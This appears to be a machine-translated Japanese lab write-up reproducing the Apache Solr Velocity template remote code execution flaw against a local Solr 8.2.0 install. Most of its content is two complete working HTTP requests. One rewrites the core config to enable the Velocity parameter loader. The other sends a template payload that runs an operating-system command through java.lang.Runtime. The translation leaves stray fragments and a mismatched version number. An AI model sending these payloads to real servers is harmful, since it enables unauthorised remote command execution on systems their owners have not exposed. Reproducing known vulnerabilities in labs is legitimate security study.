Apache Solr Velocityテンプレートリモートコード実行脆弱性再現


  • ダウンロード脆弱性環境https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip Apache Solr Velocity模板远程代码执行漏洞复现_第1张图片
  • 解凍後、solr-8.1.0/binディレクトリに入り./solr -e dih -forceを使用して脆弱性環境Apache Solr Velocity模板远程代码执行漏洞复现_第2张图片
  • を開く.
  • アクセスhttp://youip:8983/solr/#/メインインタフェースApache Solr Velocity模板远程代码执行漏洞复现_第3张图片
  • に入る.
  • 左側のCore Selectorをクリックしてコレクション名を表示すると、各プロジェクトの下にconfigファイルが表示され、dbで説明されます.Apache Solr Velocity模板远程代码执行漏洞复现_第4张图片
  • 次のpayload修正セット設定
    POST /solr/db/config HTTP/1.1
    Host: youip:8983
    Pragma: no-cache
    Cache-Control: no-cache
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
    Accept-Encoding: gzip, deflate
    Content-Type: application/json
    Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6
    Connection: close
    Content-Length: 263
    
    {
      "update-queryresponsewriter": {
        "startup": "lazy",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"
      }
    }
    Apache Solr Velocity模板远程代码执行漏洞复现_第5张图片
  • を使用する.
  • コマンド実行
    GET /solr/db/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
    Host: youip:8983
    Pragma: no-cache
    Cache-Control: no-cache
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
    Accept-Encoding: gzip, deflate
    Content-Type: application/json
    Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6
    Connection: close
    Content-Length: 0
    Apache Solr Velocity模板远程代码执行漏洞复现_第6张图片